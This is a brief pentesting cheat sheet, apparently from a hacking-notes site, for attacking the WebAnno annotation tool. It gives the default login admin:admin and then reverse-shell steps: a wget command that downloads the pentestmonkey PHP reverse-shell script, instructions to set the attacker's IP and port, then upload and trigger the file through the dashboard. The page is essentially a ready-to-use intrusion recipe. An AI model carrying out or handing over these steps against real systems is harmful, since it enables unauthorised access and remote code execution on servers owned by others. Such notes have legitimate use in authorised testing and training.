WebAnno Pentesting
Default Credentials
admin:adminReverse Shell
1. Go to the Upload Screen in Dashboard
2. Prepare Payload
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
vim shell.php
# Edit $ip and $port in editor.3. Upload the Payload
4. Access to the Payload File in Another Server
Last updated